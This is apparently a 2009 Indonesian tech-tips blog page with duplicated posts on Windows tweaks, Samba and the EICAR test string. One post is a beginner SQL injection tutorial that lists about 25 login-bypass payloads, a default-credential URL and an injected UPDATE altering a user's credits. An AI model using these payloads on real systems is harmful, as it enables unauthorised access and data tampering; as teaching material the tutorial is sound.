Secara default di windows, dokumen yang telah kita buka atau edit akan tersimpan historinya di My Recent Documents. Kalau anda ingin menghapus history tersebut secara otomatis yaitu ketika anda log off atau ketika komputer dimatikan caranya sebagai berikut :
1. Klik Start -->RUN --> ketik regedit --> klik OK
2. Pada Registry Editor masuk ke : HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Di jendela sebelah kanan : klik kanan di area kosong-->klik new--> DWORD value, kemudian beri nama : ClearRecentDocsOnExit
4. Dobel klik DWORD ClearRecentDocsOnExit, pada value data ubah angka 0 menjadi 1 --> klik OK --> exit
Untuk menormalkan kembali, lakukan kembali langkah 1, 2, dan 4. Pada langkah 4 kembalikan value data dari 1 menjadi 0.
Kamis, 16 Juli 2009
Selasa, 07 Juli 2009
Teknik dasar SQL injection
SQL singkatan dari Structured Query Language yang merupakan bahasa komputer standar yang ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.
SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yang berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yang ditimbulkan dari teknik ini membawa masalah yang sangat serius. Mengapa disebut SQL Injection ? seperti yang kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yang tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yang terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yang dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.
Keuntungan yang diambil adalah seperti login akses terhadap server yang bukan haknya atau yang lainnya, tergantung kepada penyerangnya.
Input Query String
Default setting dari SQL menggunakan :
adminID = sa
password =’’ (kosong atau blank)
misalnya : http://www.target.com/login.asp?adminID=sa%20password=’’
%20 artinya menggantikan "jarak spasi"
Ini merupakan kondisi yang berbahaya jika pengubahan setting tidak segera dilakukan.
Verifikasi yang dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yang terlihat pada teks sebagai berikut :
SQLQuery="SELECT Username FROM Users WHERE Username="’&strUsername&"’strpassword&"’
Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yang sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.
Contoh : menggunakan injection string ’OR’’= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :
SELECT Username FROM Users WHERE Username=’’OR’’=’’ AND Password=’’OR’’=’’
Maka yang terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yang sah (valid). SQL Injection yang berhasil dilakukan akan ditandai dgn munculnya error page dgn error yang dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.
Ada banyak variasi dari injection string yang dapat digunakan untuk melakukan SQL Injection :
’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
"or 0=0 –
"or 0=0 #
"or "x"="x
")or("a"="a
admin’–
hi" or 1=1 –
hi’ or’a’=’a
hi")or("a"="a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
"or 1=1–
"or "a"="a
’)or(’a’=’a
’)or(’x’=’x
hi" or "a"="a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yang dilakukan oleh penyerang. Contoh :
’UPDATE YEPCell_memberDB set Credits=100 wher UserID=’yamakasi’
Sql Injection yang dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System)(ayanan keamanan yang memonitor dan menganalisis sistem, dengan tujuan menemukan usaha-usaha tidak sah untuk mengakses resource komputer seseorang. Sistem ini juga menyediakan peringatan real-time, apabila hal ini terjadi)
View source And Link
SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yang berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yang ditimbulkan dari teknik ini membawa masalah yang sangat serius. Mengapa disebut SQL Injection ? seperti yang kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yang tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yang terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yang dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.
Keuntungan yang diambil adalah seperti login akses terhadap server yang bukan haknya atau yang lainnya, tergantung kepada penyerangnya.
Input Query String
Default setting dari SQL menggunakan :
adminID = sa
password =’’ (kosong atau blank)
misalnya : http://www.target.com/login.asp?adminID=sa%20password=’’
%20 artinya menggantikan "jarak spasi"
Ini merupakan kondisi yang berbahaya jika pengubahan setting tidak segera dilakukan.
Verifikasi yang dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yang terlihat pada teks sebagai berikut :
SQLQuery="SELECT Username FROM Users WHERE Username="’&strUsername&"’strpassword&"’
Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yang sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.
Contoh : menggunakan injection string ’OR’’= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :
SELECT Username FROM Users WHERE Username=’’OR’’=’’ AND Password=’’OR’’=’’
Maka yang terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yang sah (valid). SQL Injection yang berhasil dilakukan akan ditandai dgn munculnya error page dgn error yang dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.
Ada banyak variasi dari injection string yang dapat digunakan untuk melakukan SQL Injection :
’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
"or 0=0 –
"or 0=0 #
"or "x"="x
")or("a"="a
admin’–
hi" or 1=1 –
hi’ or’a’=’a
hi")or("a"="a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
"or 1=1–
"or "a"="a
’)or(’a’=’a
’)or(’x’=’x
hi" or "a"="a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yang dilakukan oleh penyerang. Contoh :
’UPDATE YEPCell_memberDB set Credits=100 wher UserID=’yamakasi’
Sql Injection yang dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System)(ayanan keamanan yang memonitor dan menganalisis sistem, dengan tujuan menemukan usaha-usaha tidak sah untuk mengakses resource komputer seseorang. Sistem ini juga menyediakan peringatan real-time, apabila hal ini terjadi)
View source And Link
Minggu, 05 Juli 2009
Menggerakkan cursor tanpa Mouse
Pernahkan anda mengalami ketika anda akan menggunkan komputer tiba" mousenya rusak atau "lecek" ??? :D
waduhhhh gimana tuh....
Jika anda ingin menggerakkan kursor tanpa mouse, ikuti tips & trik-trik berikut ini :
1. Klik start
2. Trus klik Run
3. ketikkan access.cpl
4. trus tekan ok
4. pilih tab mouse
5. Habis tu beri centang pada use mouse keys
6. Trus OK
Untuk menggunakannya silakan gunakan tombol angka 1-9. jangan lupa aktifkan num lock pada keyboard.
waduhhhh gimana tuh....
Jika anda ingin menggerakkan kursor tanpa mouse, ikuti tips & trik-trik berikut ini :
1. Klik start
2. Trus klik Run
3. ketikkan access.cpl
4. trus tekan ok
4. pilih tab mouse
5. Habis tu beri centang pada use mouse keys
6. Trus OK
Untuk menggunakannya silakan gunakan tombol angka 1-9. jangan lupa aktifkan num lock pada keyboard.
Cara mengetes Anti Virus
Apakah anda yakin bahwa antivirus yang anda gunakan adalah antivirus yang asli. Siapa tau antivirus yang sedang anda pakai adalah virus bo'ongan ![]()
. Wewwww..
Maka dari itu kita harus mengetes antivirus tersebut. Apakah antivirus tersebut betul – betul antivirus atau virus yang bekerja sebagai antivirus. Cara berikut adalah cara aman, karena kode berikut bukan virus maupun sebuah kode yang membahayakan.
Berikut cara mengujinya :
1.Buka Notepad < klik start - run - ketikkan notepad - ok>
2.Ketikkan atau paste text berikut :
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
3.Simpan dengan ekstensi .com. Misalnya Eicar.com ( Ketika menyimpan pilih bagian "Save as type" dengan "All Fi
les", kemudian di notepad,misalnya EICAR.COM ).
4.Jika anti-virus berjalan baik, maka sebelum file dijalankan pun antivirus akan mengenali. Jika tidak, maka jalankan file tersebut dengan double click atau melalui DOS Prompt
ketika saya mengujinya, komputer saya menggunakan antivirus AVG, dan hasilnya AVG mendeteksi file tadi. itu berarti antivirus yang saya gunakan adalah benar - benar antivirus. bukan virus yang menyerupai antivirus.
sekian, walaupun singkat semoga bermanfaat!!!!
Maka dari itu kita harus mengetes antivirus tersebut. Apakah antivirus tersebut betul – betul antivirus atau virus yang bekerja sebagai antivirus. Cara berikut adalah cara aman, karena kode berikut bukan virus maupun sebuah kode yang membahayakan.
Berikut cara mengujinya :
1.Buka Notepad < klik start - run - ketikkan notepad - ok>
2.Ketikkan atau paste text berikut :
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
3.Simpan dengan ekstensi .com. Misalnya Eicar.com ( Ketika menyimpan pilih bagian "Save as type" dengan "All Fi
les", kemudian di notepad,misalnya EICAR.COM ).
4.Jika anti-virus berjalan baik, maka sebelum file dijalankan pun antivirus akan mengenali. Jika tidak, maka jalankan file tersebut dengan double click atau melalui DOS Prompt
ketika saya mengujinya, komputer saya menggunakan antivirus AVG, dan hasilnya AVG mendeteksi file tadi. itu berarti antivirus yang saya gunakan adalah benar - benar antivirus. bukan virus yang menyerupai antivirus.
sekian, walaupun singkat semoga bermanfaat!!!!
Senin, 18 Mei 2009
Samba Server
Samba merupakan serangkaian aplikasi unix yang berkomunikasi dengan protokol Server Message Block (SMB), yang dikembangkan oleh Andrew Tridgell yang selanjutnya sampai saat ini banyak dibantu oleh para programmer di internet dengan tetap di supervisi oleh Andrew Tridgell. SMB adalah protokol komunikasi data yang juga digunakan oleh Microsoft dan OS/2 untuk menampilkan fungsi jaringan client-server yang menyediakan sharinga file dan printer serta tugas-tugas lainnya yang berhubungan. Samba server memungkinkan komputer-komputer Unix/Linux melakukan sharing file dan printer dengan komputer windows bukan hanya dengan komputer-komputer Unix/Linux sendiri. Beberapa fungsi yang disediakan Samba server, yaitu sebagai berikut:
• Sharing file/direktori antar Unix/Linux dengan windows client
• Sharing printer pada Samba server dengan windows client
• Memudahkan proses network browsing
• Menyediakan proses Autentikasi komputer windows client ketika login ke Windows domain
• Menyediakan dan membantu proses netbios nama resolution dengan Windows Internet Name Service (WINS) name-server resolution
Sebagaimana telah disebutkan bahwa Samba merupakan serangkaian aplikasi yang juga meliputi aplikasi client maka samaba juga menyediakan tools client untuk memungkinkannya beberapa user pada system Unix/Linux mengakses direktori dan printer yang terdapat pada system windows dan Samba server malalui jaringan. Selain tools client, pada Samba juga terdapat bebrapa palikasi server, diantaranya yaitu: smbd dan nmbd.
• smbd adalah aplikasi server atau daemon yang menangani proses sharing file/direktori dan printer, juga menangani proses autentikasi dan otorisasi SMB client.
• nmbd adalah aplikasi atau daemon yang menudung Netbios name service dan WINS, yang juga membantu proses network browsing pada windows client.
Samba didistribusikan sebagai open source dengan lisensi GPL (GNU Public Licence)
• Sharing file/direktori antar Unix/Linux dengan windows client
• Sharing printer pada Samba server dengan windows client
• Memudahkan proses network browsing
• Menyediakan proses Autentikasi komputer windows client ketika login ke Windows domain
• Menyediakan dan membantu proses netbios nama resolution dengan Windows Internet Name Service (WINS) name-server resolution
Sebagaimana telah disebutkan bahwa Samba merupakan serangkaian aplikasi yang juga meliputi aplikasi client maka samaba juga menyediakan tools client untuk memungkinkannya beberapa user pada system Unix/Linux mengakses direktori dan printer yang terdapat pada system windows dan Samba server malalui jaringan. Selain tools client, pada Samba juga terdapat bebrapa palikasi server, diantaranya yaitu: smbd dan nmbd.
• smbd adalah aplikasi server atau daemon yang menangani proses sharing file/direktori dan printer, juga menangani proses autentikasi dan otorisasi SMB client.
• nmbd adalah aplikasi atau daemon yang menudung Netbios name service dan WINS, yang juga membantu proses network browsing pada windows client.
Samba didistribusikan sebagai open source dengan lisensi GPL (GNU Public Licence)
Langganan:
Postingan (Atom)